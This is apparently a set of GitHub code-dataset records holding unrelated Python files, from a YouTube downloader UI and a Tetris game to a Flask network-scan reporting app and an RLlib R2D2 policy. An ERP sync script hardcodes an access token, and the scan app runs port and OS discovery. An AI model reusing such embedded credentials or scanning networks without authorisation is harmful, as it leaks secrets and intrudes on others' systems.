'tabs/download.ui'\n loadUi(datadir, self)\n self.webEngineView.setPage(WebEnginePage(self.webEngineView))\n self.webEngineView.settings().setAttribute(QWebEngineSettings.FullScreenSupportEnabled, True)\n self.page = self.webEngineView.page()\n self.page.fullScreenRequested.connect(self.toggleFullScreen)\n self.webEngineView.exitFullScreen = QShortcut(QKeySequence(Qt.Key_Escape), self.webEngineView)\n self.webEngineView.exitFullScreen.activated.connect(self.exitFullScreen)\n self.Streams.sortByColumn(1, Qt.DescendingOrder)\n self.Streams.itemChanged.connect(self.tickbox)\n\n def toggleFullScreen(self, request):\n if request.toggleOn():\n request.accept()\n self.webViewLayout.removeWidget(self.webEngineView)\n self.webEngineView.setParent(None)\n self.webEngineView.showFullScreen()\n else:\n request.accept()\n self.webEngineView.setGeometry(QRect(int((self.geometry().width()-800)/2), 0, 784, 434))\n self.webViewLayout.addWidget(self.webEngineView)\n QApplication.setActiveWindow(self.main_window)\n self.webEngineView.setFocus()\n widget = QApplication.focusObject()\n print(widget)\n\n def exitFullScreen(self):\n self.webEngineView.triggerPageAction(self.page.ExitFullScreen)\n\n def start_worker(self):\n worker = DownloadManager(self)\n worker.sig_msg.connect(self.textDisplay.setText)\n worker.sig_item.connect(self.showStreams)\n worker.sig_item.connect(self.showThumbnail)\n worker.sig_tProgress.connect(self.update_total)\n worker.sig_dProgress.connect(self.downloadProgress.setValue)\n worker.sig_error.connect(self.main_window.show_error)\n worker.sig_done.connect(self.on_worker_done)\n\n thread = 
QThread()\n self.threads.append((thread, worker))\n worker.moveToThread(thread)\n\n self.main_window.downloadBtn.setEnabled(False)\n self.main_window.downloadAllBtn.setEnabled(False)\n\n thread.started.connect(worker.start_downloader)\n thread.start()\n\n def download(self):\n self.main_window.tab_manager.setCurrentIndex(1)\n self.totalProgress.setMaximum(len(self.main_window.downloadVideos.selectedIndexes()))\n QApplication.instance().processEvents()\n self.start_worker()\n\n def downloadAll(self):\n self.main_window.downloadVideos.selectAll()\n self.download()\n\n def update_total(self, i):\n self.totalProgress.setFormat('{}/{}'.format(i, self.totalProgress.maximum()))\n\n def abort_workers(self):\n for thread, worker in self.threads:\n worker.abort()\n thread.quit()\n thread.wait()\n\n @pyqtSlot()\n def on_worker_done(self):\n self.textDisplay.setText('All downloads complete.')\n\n self.main_window.downloadBtn.setEnabled(True)\n self.main_window.downloadAllBtn.setEnabled(True)\n\n def showVideo(self, idx):\n item = idx.model().itemFromIndex(idx)\n info = item.info\n if info is None:\n return\n videoId = info.get('id')\n netloc = urlparse(info.get('webpage_url')).netloc\n myhtml = \"\"\"\"\"\".format(netloc, videoId)\n\n self.webEngineView.setHtml(myhtml, QUrl(\"local\"))\n self.main_window.tab_manager.setCurrentIndex(1)\n self.webEngineView.setFocus()\n\n if self.sender() == self.main_window.downloadVideos:\n self.showStreams(item)\n\n def showStreams(self, item):\n if self.Streams.topLevelItemCount() == 2:\n if self.video_streams.itemparent is item:\n return\n else:\n self.Streams.clear()\n\n self.video_streams = rootWidgetItem(self.Streams, ['Video'])\n self.audio_streams = rootWidgetItem(self.Streams, ['Audio'])\n self.video_streams.itemparent = item\n self.audio_streams.itemparent = item\n\n info = item.info\n if info.get('formats') is None:\n info = self.main_window.API.ydl.extract_info(info['webpage_url'], download=False)\n videos, audios = self.main_window.API.ydl.list_formats(info)\n for entry in videos:\n t = TreeWidgetItem(entry)\n if entry[0] in item.video_streams:\n t.setCheckState(0, 2)\n else:\n t.setCheckState(0, 0)\n self.video_streams.addChild(t)\n for entry in audios:\n t = TreeWidgetItem(entry)\n if entry[0] in item.audio_streams:\n t.setCheckState(0, 2)\n else:\n t.setCheckState(0, 0)\n t.setCheckState(0, 0)\n self.audio_streams.addChild(t)\n self.Streams.expandAll()\n\n def tickbox(self, item):\n if item.checkState(0) == 2:\n if item.text(1) == 'audio only':\n item.parent().itemparent.audio_streams.add(item.text(0))\n else:\n item.parent().itemparent.video_streams.add(item.text(0))\n else:\n if item.text(1) == 'audio only':\n item.parent().itemparent.audio_streams.remove(item.text(0))\n else:\n item.parent().itemparent.video_streams.remove(item.text(0))\n\n def showThumbnail(self, item):\n thumbnail = item.info['thumbnail_entry']\n header = \"\"\"\n \n \n \n \n \n \n \n \n \n\n \n \"\"\"\n\n footer = \"\"\"\n \n \n \"\"\"\n\n myhtml = header + thumbnail + footer\n self.webEngineView.setHtml(myhtml)\n","repo_name":"BII-wushuang/YouTube_Helper","sub_path":"tabs/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":15531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"38813737864","text":"#! python3\n\n# Write a program that opens all .txt files in a folder and searches for any\n# line that matches a user-supplied regular expression. 
The results should\n# be printed to the screen.\nimport re, os\n## Building Folder Structure\n# Get the directory path of the current script\nscript_directory = os.path.dirname(os.path.abspath(__file__))\n# Create the file path\ndir_path = os.path.join(script_directory, 'regex_search_folder')\n\n# List files in the directory\nfiles = os.listdir(dir_path)\n\nwhile True:\n pattern_input = input(\"***\\nEnter a regular expression pattern: \")\n pattern_occurred = False\n\n for file in files:\n file_path = os.path.join(dir_path, file)\n # print(file_path)\n\n # Open File and split each line\n file_open = open(file_path, 'r')\n file_line_list = file_open.read().split(\"\\n\")\n\n # Loop thru file_line_list and store index using enumerate\n for index, line in enumerate(file_line_list, start=1):\n # using regex, search each line using pattern input and print it out\n if re.search(pattern_input, line):\n print(f\"Search Pattern '{pattern_input}' Found in...\\nFile: '{file}' on Line: '{index}' = '{line}'\\n\")\n pattern_occurred = True \n # matches = re.findall(pattern_input, line)\n # print(matches)\n\n if not pattern_occurred:\n print(f\"\\nNo Search Pattern '{pattern_input}' Found\\n\")\n\n","repo_name":"BlakeXYZ/AtBS-Python-Projects","sub_path":"ch9__Reading and Writing Files/regexSearch.py","file_name":"regexSearch.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"25899723051","text":"#!/bin/python3\nimport sys\nimport argparse\nimport requests\nimport yaml\n\n# HOST = \"http://localhost:8080\"\nHOST = \"https://linebot-nsun2l34rq-de.a.run.app\"\n\ndef loadQuestion(args):\n config = args.config[0]\n with open(config, 'r') as input:\n questionSet = [\n q for q in yaml.safe_load_all(input) if q is not None\n ]\n for questions in questionSet:\n postQuestionSet(questions)\n\ndef postQuestionSet(questions):\n questions = questions[::-1]\n next = None\n for question in questions:\n next = postQuestion(question, next)\n\ndef postQuestion(question, next):\n chat = postAction(question.get('chat', []))\n ok = [{\"id\": postAction(act)} for act in question.get('ok', [])]\n error = [{\"id\": postAction(act)} for act in question.get('error', [])]\n response = requests.post(f\"{HOST}/api/questions\", json={\n \"chat\": {\"id\": chat},\n \"answer\": question[\"answer\"],\n \"ok\": ok,\n \"error\": error,\n \"next\" : [{\"id\": next} ] if next is not None else [],\n })\n if response.status_code != 200:\n raise RuntimeError(response.text)\n q = response.json()\n print(q)\n return q[\"id\"]\n\ndef loadChat(args):\n config = args.config[0]\n with open(config, 'r') as input:\n actions = [\n action for action in yaml.safe_load_all(input)\n if action is not None\n ]\n for action in actions:\n postAction(action)\n\ndef postAction(action) -> int:\n chats = action[::-1]\n nxt: int = None\n for chat in chats:\n nxt = postChat(chat, nxt)\n return nxt\n\ndef postChat(chat, nxt: int = None) -> int:\n msgType = None\n if \"text\" in chat:\n msgType = \"text\"\n elif \"sticker\" in chat:\n msgType = \"sticker\"\n elif \"image\" in chat:\n msgType = \"image\"\n if nxt:\n chat[\"nextChats\"] = [{\"id\": nxt}]\n response =requests.post(f\"{HOST}/api/chats/{msgType}\", json=chat)\n if response.status_code != 200:\n raise RuntimeError(response.text)\n result = response.json()\n print(result)\n return result[\"id\"]\n\ndef debug(args):\n print(\"debug\")\n\ndef main():\n parser = argparse.ArgumentParser(description=\"linebot 
util\")\n    subparsers = parser.add_subparsers()\n\n    debug_cmd = subparsers.add_parser(\"debug\")\n    debug_cmd.set_defaults(func=debug)\n\n    load_chat_cmd = subparsers.add_parser(\"loadChat\")\n    load_chat_cmd.set_defaults(func=loadChat)\n    load_chat_cmd.add_argument(\"config\", nargs=1, type=str)\n\n    load_question_cmd = subparsers.add_parser(\"loadQuestion\")\n    load_question_cmd.set_defaults(func=loadQuestion)\n    load_question_cmd.add_argument(\"config\", nargs=1, type=str)\n\n    args = parser.parse_args(sys.argv[1:])\n    args.func(args)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"blueworrybear/linebot","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"27545306455","text":"# Creating PDF Files with Python\n\n# Why PDF?\n# PDF file format is global. It is one of the most common file formats in use today and extensively used in all areas.\n# It is portable. Yes! PDF stands for Portable Document Format. You can move your files around without having to worry about any restrictions.\n# It is a platform-independent tool. It is independent of the hardware and the operating system. You can create your pdf files in Windows and view them in a Macintosh or Unix.\n# It can be used offline. You don’t even need an internet connection.\n# The ease of generation. There are many different ways to create a PDF file. Our purpose is to learn how to do it with Python.\n\n# Import fpdf class\nfrom fpdf import FPDF\n\n# Assign size of A4 dimensions to variables for later use\n# The size of A4 is: w:210 mm and h:297 mm\npdf_width = 210\npdf_height = 297\n\nclass PDF(FPDF):\n    # Create a method to draw a line in the middle of the page\n    # (named middle_line so it does not shadow FPDF's built-in line method)\n    def middle_line(self):\n        # Set line width to 0.0 mm\n        self.set_line_width(0.0)\n\n        # Draw a simple line with four arguments: line(x1, y1, x2, y2)\n        self.line(0, pdf_height/2, pdf_width, pdf_height/2)\n\n# Create an object of the PDF class with default A4 format\n# PyFPDF is built on the coordinate space (x,y); the default page format is 'A4'\npdf = PDF(orientation='P', unit='mm', format='A4')\n\n# Add a page, draw the line and save the output\npdf.add_page() # add_page adds a new page to the document\npdf.middle_line()\npdf.output('python-notes.pdf', 'F')\n","repo_name":"Jokmonsimon/python-20-days-challenge","sub_path":"afande-ojok/pc_20_days_set_2/0x02-day_2/pdf_generator.py","file_name":"pdf_generator.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"31515337572","text":"import logging\nimport requests\nimport json\nimport sys\nimport traceback\nBASE_URL_ERP = \"http://xxxx:port/api/v1/\"\nBASE_URL_ELS = \"http://xxxx:port/eslhttpservice/pushgoods/\"\ndebug = 0\nif len(sys.argv)>1:\n    debug = sys.argv[1]\n    print(debug)\ndef get_commodity():\n    reqdata = {}\n    reqdata['x-access-token'] = \"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiSFowODgwOCJ9.hpuBiupMSHaEu9LKOOms8PknZ1cXqxi1uBVoMMMiAIQ\"\n    reqdata['command'] = 'query_all_commodity'\n    r = requests.post(BASE_URL_ERP + 'post_common/', json=reqdata)\n    result = r.json()\n    if r.status_code == 200:\n        if debug == \"1\":\n            print(\"get response == \", json.dumps(result, sort_keys=True, indent=4, ensure_ascii=False))\n        return result\n    else:\n        logging.error('get_commodity fail! error msg is : %s' % json.dumps(result, sort_keys=True, ensure_ascii=False))\n        if debug == \"1\":\n            print(\"get_commodity fail! error msg is :\", result)\n        return None\n\ndef organize_commodity(commodity_resp):\n    array = commodity_resp['output']\n    ol = [[]for i in range(len(array))]\n    comm_id =0 \n    for t in array:\n        ol[comm_id].append({'PropertyName': 'GoodsCode', 'Value': t['barcode']})\n        ol[comm_id].append({'PropertyName': '商品名称', 'Value': t['name']})\n        ol[comm_id].append({'PropertyName': \"产地\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"规格\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"计价单位\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"等级\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"零售价\", 'Value': t['price']})\n        ol[comm_id].append({'PropertyName': \"会员价\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"货号\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': '条码', 'Value': t['barcode']})\n        ol[comm_id].append({'PropertyName': \"二维码\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"缺货标记\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"促销开始时间\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"促销结束时间\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"原价\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"现价\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"货架号\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"最低库存\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"最高库存\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"长宽高\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"当前库存\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"默认供应商代码\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"默认供应商名称\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"是否促销\", 'Value': \" \"})\n        ol[comm_id].append({'PropertyName': \"活动时间\", 'Value': \" \"})\n        comm_id+=1\n    if debug == \"1\":\n        print(\"organize_commodity == \", json.dumps(ol, sort_keys=True, indent=4, ensure_ascii=False))\n    return ol\n\ndef sync_commodity():\n    ret = get_commodity()\n    if ret is None:\n        logging.info('Get commodity failed !')\n        print(\"-3\")\n        return\n    if int(ret['nums']) < 1: # not even one record was retrieved\n        print(\"-2\")\n        logging.info('There is no commodity in erp system')\n        return\n    commodity_list = organize_commodity(ret)\n    if debug == \"1\":\n        print(\"send post == \", json.dumps(commodity_list, sort_keys=True, indent=4, ensure_ascii=False))\n    for commodity in commodity_list: \n        try:\n            r = requests.post(BASE_URL_ELS, json=commodity)\n        except Exception as e:\n            print(\"-4\")\n            print(e)\n            serr = traceback.format_exc()\n            continue\n        if r.status_code != 200:\n            print(\"-5\")\n            if debug == \"1\":\n                print(\"sync error msg: \", r.text)\n            continue\n        result = r.json()\n        if result['result'] != \"succeeded\":\n            # this sync failed, do not save any data\n            print(\"-6\")\n            if debug == \"1\":\n                print(\"sync error msg: \", r.text,commodity[0])\n            continue\n        if debug == \"1\":\n            print(\"got response == \", json.dumps(result, sort_keys=True, indent=4, ensure_ascii=False))\n\n#import pdb\ndef main():\n#    pdb.set_trace()\n    sync_commodity()\nmain()\n","repo_name":"htbig/Json-Struct","sub_path":"full-syc-data.py","file_name":"full-syc-data.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"74075533084","text":"from asyncio.queues import Queue\nimport logging\nimport random\nimport asyncio\nfrom common import 
Dimensions\nfrom copy import deepcopy\nfrom shape import SHAPES\nfrom collections import Counter\n\nlogger = logging.getLogger(\"Game\")\nlogger.setLevel(logging.DEBUG)\n\nGAME_SPEED = 10\nSPEED_STEP = 10 # points\n\n\nclass Game:\n def __init__(self, x=10, y=30) -> None:\n logger.info(\"Game\")\n self.dimensions = Dimensions(x, y)\n self.current_piece = None\n self.next_pieces = [deepcopy(random.choice(SHAPES)) for _ in range(3)]\n\n self._bottom = [(i, y) for i in range(x)] # bottom\n self._lateral = [(0, i) for i in range(y)] # left\n self._lateral.extend([(x - 1, i) for i in range(y)]) # right\n\n self.grid = self._bottom + self._lateral\n\n self.game = []\n self.score = 0\n self.speed = 1\n self.game_speed = 10\n self._lastkeypress = None\n\n self.running = True\n\n def info(self):\n return {\n \"dimensions\": self.dimensions,\n \"grid\": self.grid,\n \"game_speed\": self.game_speed,\n \"score\": self.score\n }\n\n def clear_rows(self):\n lines = 0\n\n for item, count in sorted(Counter(y for _, y in self.game).most_common()):\n if count == len(self._bottom) - 2:\n self.game = [\n (x, y + 1) if y < item else (x, y)\n for (x, y) in self.game\n if y != item\n ] # remove row and drop lines\n lines += 1\n logger.debug(\"Clear line %s\", item)\n\n self.score += lines ** 2\n\n self.game_speed = GAME_SPEED + self.score // SPEED_STEP\n\n most_common = Counter(y for _, y in self.game).most_common(1)\n if most_common != []:\n (_, count) = most_common[0]\n assert count != len(self._bottom) - 2, f\"please create an issue https://github.com/dgomes/ia-tetris/issues sharing:\\n {self.game}\"\n\n def keypress(self, key):\n \"\"\"Update locally last key pressed.\"\"\"\n self._lastkeypress = key\n\n async def loop(self):\n logger.info(\"Loop - score: %s - speed: %s\", self.score, self.game_speed)\n await asyncio.sleep(1.0 / self.game_speed)\n if self.current_piece is None:\n self.current_piece = self.next_pieces.pop(0)\n self.next_pieces.append(deepcopy(random.choice(SHAPES)))\n\n logger.debug(\"New piece: %s\", self.current_piece)\n self.current_piece.set_pos(\n (self.dimensions.x - self.current_piece.dimensions.x) / 2, 0\n )\n if not self.valid(self.current_piece):\n logger.info(\"GAME OVER\")\n self.running = False\n\n self.current_piece.y += 1\n\n if self.valid(self.current_piece):\n if self._lastkeypress == \"s\":\n while self.valid(self.current_piece):\n self.current_piece.y += 1\n self.current_piece.y -= 1\n elif self._lastkeypress == \"w\":\n self.current_piece.rotate()\n if not self.valid(self.current_piece):\n self.current_piece.rotate(-1)\n elif self._lastkeypress == \"a\":\n shift = -1\n elif self._lastkeypress == \"d\":\n shift = +1\n\n if self._lastkeypress in [\"a\", \"d\"]:\n self.current_piece.translate(shift, 0)\n if self.collide_lateral(self.current_piece):\n logger.debug(\"Hitting the wall\")\n self.current_piece.translate(-shift, 0)\n elif not self.valid(self.current_piece):\n self.current_piece.translate(-shift, 0)\n\n else:\n self.current_piece.y -= 1\n self.game.extend(self.current_piece.positions)\n\n self.clear_rows()\n\n self.current_piece = None\n\n self._lastkeypress = None\n\n logger.debug(\"Current piece: %s\", self.current_piece)\n return {\n \"game\": self.game,\n \"piece\": self.current_piece.positions if self.current_piece else None,\n \"next_pieces\": [n.positions for n in self.next_pieces],\n \"game_speed\": self.game_speed,\n \"score\": self.score,\n }\n\n def valid(self, piece):\n return not any(\n [piece_part in self.grid for piece_part in piece.positions]\n ) and 
not any([piece_part in self.game for piece_part in piece.positions])\n\n    def collide_lateral(self, piece):\n        return any([piece_part in self._lateral for piece_part in piece.positions])\n","repo_name":"dgomes/ia-tetris","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"86"} +{"seq_id":"74726717405","text":"import logging\nimport sys\n\n\ndef setup_logging(config):\n\tlog_level = logging.WARNING\n\tif 'log_level' in config:\n\t\tlog_level = getattr(logging, config['log_level'].upper())\n\troot = logging.getLogger()\n\troot.setLevel(log_level)\n\n\tlog_path = config.get('log_path', 'stdout')\n\tif not log_path or log_path == 'stdout':\n\t\thandler = logging.StreamHandler(sys.stdout)\n\telif log_path == 'stderr':\n\t\thandler = logging.StreamHandler(sys.stderr)\n\telif log_path:\n\t\thandler = logging.StreamHandler(log_path)\n\n\thandler.setLevel(log_level)\n\n\t# define the logging format\n\tformatter = logging.Formatter('[%(asctime)s] [%(levelname)8s] [%(name)s] %(message)s')\n\thandler.setFormatter(formatter)\n\n\t# add the logging handler for all loggers\n\troot.addHandler(handler)\n","repo_name":"anlutro/prove-cm","sub_path":"prove/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"30880354895","text":"from random import randint\nimport math\nimport numpy as np\nimport pandas as pd\nimport operator\n\n\nclass knn:\n\n\tsizeData = 134\n\tdata = None\n\n\t# list of tuples [index of the element in the dataframe, distance] \n\tdistList = [[0,1000],[0,1000],[0,1000],[0,1000],[0,1000]]\n \n\n\n\tdef __init__( self, sizeDataE, data ):\n\t\tself.sizeData = sizeDataE\n\t\tself.data = data\n\n\n\tdef calculate( self, newData ):\n\n\t\t# Measure the distance between the new sample and all the samples that are already classified\n\t\t# iterate over the dataframe\n\t\tfor index in range( len( self.data ) ):\n\t\t\t\n\n\t\t\t# compute the Manhattan distance between the dataframe points and the new point\n\t\t\tdist = self.manhattanDistance( newData, index )\n\n\n\t\t\t# keep the k smallest distances (saved into an array)\t\n\t\t\t# find the element with the largest distance\n\t\t\tmaior = self.distList[0][1]\n\t\t\tindexMaior = 0\t\n\t\t\tfor i in range(len( self.distList ) ):\n\t\t\t\tif( self.distList[i][1] > maior ):\n\t\t\t\t\tmaior = self.distList[i][1]\n\t\t\t\t\tindexMaior = i\n\n\n\t\t\tif( dist < maior ):\n\t\t\t\tself.distList[indexMaior] = [index, dist]\n\n\n\t\treturn self.classifier()\n\t\n\n\n\tdef classifier( self ):\n\n\t\tfake = 0\n\t\tgenuine = 0\n\n\t\t# go through the classes of the smallest-distance samples and count how many times each class appears (fake or genuine)\n\t\tfor elem in self.distList:\n\t\t\tfakeGenuine = int(self.data.iloc[elem[0], 2])\n\t\t\n\t\t\tif( fakeGenuine == 1 ):\n\t\t\t\tfake += 1\n\t\t\telif( fakeGenuine == 0 ):\n\t\t\t\tgenuine += 1\n\n\t\t# Take as the result the class that appeared most often among the samples with the smallest distances\n\t\tif( fake > genuine ):\n\t\t\treturn \"fake\"\n\t\telse:\n\t\t\treturn \"genuine\"\n\t\t\n\n\tdef manhattanDistance( self, k, x ):\n\t\t\n\t\tresult = 0.0\n\t\t\n\t\t# fetch each of the FV values from the database for x and for k\n\t\tcount = 0\n\t\tfor fv in range(21, 34):\n\n\t\t\tvx = int(self.data.iloc[x, fv])\n\t\t\tvk = int(k[count])\n\n\t\t\txkSum = ( vx - vk )\n\t\t\tif( xkSum < 0 ):\n\t\t\t\txkSum *= (-1)\n\n\t\t\tresult += xkSum\n\t\t\tcount += 1\n\n\t\treturn result\n\n\n\n\ndata = pd.read_csv('facialFeatures.csv') \n\n\nhappy = data[data[\"emotion\"] == \"happy\"]\nsad = data[data[\"emotion\"] == \"sad\"]\n\n\n# feature values of the newly collected sample\nnewData = happy.iloc[0, 21 :]\n\n\nknnSad = knn( len(happy), happy )\nprint( knnSad.calculate( newData ) )","repo_name":"JaineBudke/fake_emotion_analysis","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"28248606840","text":"from flask import Flask, render_template, request, url_for, send_file\nimport os\nimport mongo_connection\nimport localscan\nimport cloud_scan\nimport network_diagram\nimport docx_creation\nimport time\napp = Flask(__name__)\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef forside():\n    \"\"\"\n    -> scan.html\n    \"\"\"\n    return render_template('scan.html')\n\n\n@app.route('/scan', methods=['POST', 'GET'])\ndef scan():\n    \"\"\"\n    -> scan.html\n    \"\"\"\n    if request.method == 'POST':\n\n        options = {\n            \"company_name\": request.form.get(\"customer\"),\n            \"port_scan\": 'ports' in request.form,\n            \"port_range\": request.form.get(\"port-range\"),\n            \"port_speed\": request.form.get(\"port-speed\"),\n            \"os_detection\": 'os' in request.form,\n            \"own_ip\": 'own-ip' in request.form,\n            \"exclude_other_ip\": request.form.get(\"other-ip\"),\n            \"client_id\": request.form.get(\"client-id\"),\n            \"tenant-id\": request.form.get(\"tenant-id\"),\n            \"secret-value\": request.form.get(\"secret-value\"),\n            \"subscription-id\": request.form.get(\"subscription-id\"),\n        }\n        if options[\"client_id\"] != '' and options[\"tenant-id\"] != '' and options['secret-value'] != '' and options['subscription-id'] != '':\n            cloud_scan.export_azure_info(company_name=options['company_name'],\n                                         client_id=options['client_id'],\n                                         tentant=options[\"tenant-id\"],\n                                         secret=options[\"secret-value\"],\n                                         sub=options['subscription-id'])\n            network_diagram.make_cloud_diagram(company_name=options['company_name'])\n        localscan.network_scan(port_scan=bool(options['port_scan']),\n                               port_range=options['port_range'],\n                               port_scan_speed=options[\"port_speed\"],\n                               os_scan=bool(options[\"os_detection\"]),\n                               exclude_own_ip=bool(options['own_ip']),\n                               company_name=options['company_name']\n                               )\n        time.sleep(0.5)\n        network_diagram.make_local_diagram(company_name=options['company_name'])\n        try:\n            del(request.method)\n        except:\n            pass\n        return render_template('scan.html')\n    else:\n        return render_template('scan.html')\n\n\n@app.route('/eksport', methods=['POST', 'GET'])\ndef eksport():\n    \"\"\"\n    -> eksport.html\n    \"\"\"\n    json_files = os.listdir(\"/home/pi/Documents/final/scan-results\")\n    diagrams = os.listdir(\"/home/pi/Documents/final/network_diagrams\")\n    report_list = []\n    for i in diagrams:\n        for x in json_files:\n            if i[0:-12] == x[0:-10]:\n                report_list.append(i[0:-18])\n    if request.method == 'POST':\n        print(\"making report\")\n        company = request.form.get(\"report_company\")\n        print(company)\n        docx_creation.report_generation(company_name=company)\n        os.remove(f\"/home/pi/Documents/final/network_diagrams/{company}_local_diagram.png\")\n        os.remove(f\"/home/pi/Documents/final/scan-results/{company}_local_scan.json\")\n        try:\n            os.remove(f\"/home/pi/Documents/final/network_diagrams/{company}_cloud_diagram.png\")\n            os.remove(f\"/home/pi/Documents/final/scan-results/{company}_cloud_scan.json\")\n        
except:\n            pass\n        p1 = mongo_connection.mongodb_control()\n        p1.docx_upload(file_path=f\"/home/pi/Documents/final/generated_report/{company}_network_scan.docx\", costumer_name=company)\n        return render_template('eksport.html', reports=report_list)\n    else:\n        return render_template('eksport.html', reports=report_list)\n\n\n@app.route('/database', methods=['POST', 'GET'])\ndef database():\n    \"\"\"\n    -> database.html\n    \"\"\"\n    for file in os.listdir(r\"/home/pi/Documents/final/file_to_send\"):\n        os.remove(f\"/home/pi/Documents/final/file_to_send/{file}\")\n    p1 = mongo_connection.mongodb_control()\n    if request.method == 'POST':\n        path = p1.docx_download(request.form.get(\"serienummer\"))\n        return send_file(path)\n    else:\n        return render_template('database.html', all_data=p1.get_all_docx())\n\n\nif __name__ == '__main__':\n    app.run(host=\"0.0.0.0\")\n","repo_name":"Nicolaj-J/IT-teknolog_Afsluttende-projekt","sub_path":"Final/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"41265406554","text":"\"\"\" Write a function that takes a list of words as an input parameter. The function draws one of the words at random as the word to guess.\nThen one letter of that word is drawn and the incomplete word is printed, e.g. if the drawn word is piłka,\nthe output is _ _ ł _ _. The user types the word they think it is, trying to guess it; if they guessed right, an appropriate\nmessage is shown together with the number of attempts that were needed to guess the word. On every failed attempt another\nletter of the word is drawn; the function ends once the word is guessed or the last letter has been drawn. \"\"\"\nimport random,string\ndef losy(lista):\n    x = list(string.ascii_lowercase)\n    random.seed()\n    z = random.choice(lista)\n    y = random.choice(z)\n    x.remove(y)\n    for k in range(0,len(x)):\n        z = z.replace(x[k],'_') # keep the result: str.replace returns a new string\n    print(z)\n    \nlista = [\"pilka\",\"robak\",\"pies\",\"walec\"]\nlosy(lista)","repo_name":"sebastianceloch/wd_io","sub_path":"kolos1/zadanie7.py","file_name":"zadanie7.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"23575339784","text":"\"\"\"TensorFlow policy class used for R2D2.\"\"\"\n\nfrom typing import Dict, List, Optional, Tuple\n\nimport gymnasium as gym\n\nimport ray\nfrom ray.rllib.algorithms.dqn.dqn_tf_policy import (\n    PRIO_WEIGHTS,\n    build_q_model,\n    clip_gradients,\n    compute_q_values,\n    postprocess_nstep_and_prio,\n)\nfrom ray.rllib.models.action_dist import ActionDistribution\nfrom ray.rllib.models.modelv2 import ModelV2\nfrom ray.rllib.models.tf.tf_action_dist import Categorical\nfrom ray.rllib.models.torch.torch_action_dist import TorchCategorical\nfrom ray.rllib.policy.policy import Policy\nfrom ray.rllib.policy.sample_batch import SampleBatch\nfrom ray.rllib.policy.tf_mixins import LearningRateSchedule, TargetNetworkMixin\nfrom ray.rllib.policy.tf_policy_template import build_tf_policy\nfrom ray.rllib.utils.framework import try_import_tf\nfrom ray.rllib.utils.tf_utils import huber_loss\nfrom ray.rllib.utils.typing import AlgorithmConfigDict, ModelInputDict, TensorType\n\ntf1, tf, tfv = try_import_tf()\n\n\ndef build_r2d2_model(\n    policy: Policy,\n    obs_space: gym.spaces.Space,\n    action_space: gym.spaces.Space,\n    config: AlgorithmConfigDict,\n) -> Tuple[ModelV2, ActionDistribution]:\n    \"\"\"Build q_model and target_model for 
DQN\n\n Args:\n policy: The policy, which will use the model for optimization.\n obs_space (gym.spaces.Space): The policy's observation space.\n action_space (gym.spaces.Space): The policy's action space.\n config (AlgorithmConfigDict):\n\n Returns:\n q_model\n Note: The target q model will not be returned, just assigned to\n `policy.target_model`.\n \"\"\"\n\n # Create the policy's models.\n model = build_q_model(policy, obs_space, action_space, config)\n\n # Assert correct model type by checking the init state to be present.\n # For attention nets: These don't necessarily publish their init state via\n # Model.get_initial_state, but may only use the trajectory view API\n # (view_requirements).\n assert (\n model.get_initial_state() != []\n or model.view_requirements.get(\"state_in_0\") is not None\n ), (\n \"R2D2 requires its model to be a recurrent one! Try using \"\n \"`model.use_lstm` or `model.use_attention` in your config \"\n \"to auto-wrap your model with an LSTM- or attention net.\"\n )\n\n return model\n\n\ndef r2d2_loss(policy: Policy, model, _, train_batch: SampleBatch) -> TensorType:\n \"\"\"Constructs the loss for R2D2TFPolicy.\n\n Args:\n policy: The Policy to calculate the loss for.\n model (ModelV2): The Model to calculate the loss for.\n train_batch: The training data.\n\n Returns:\n TensorType: A single loss tensor.\n 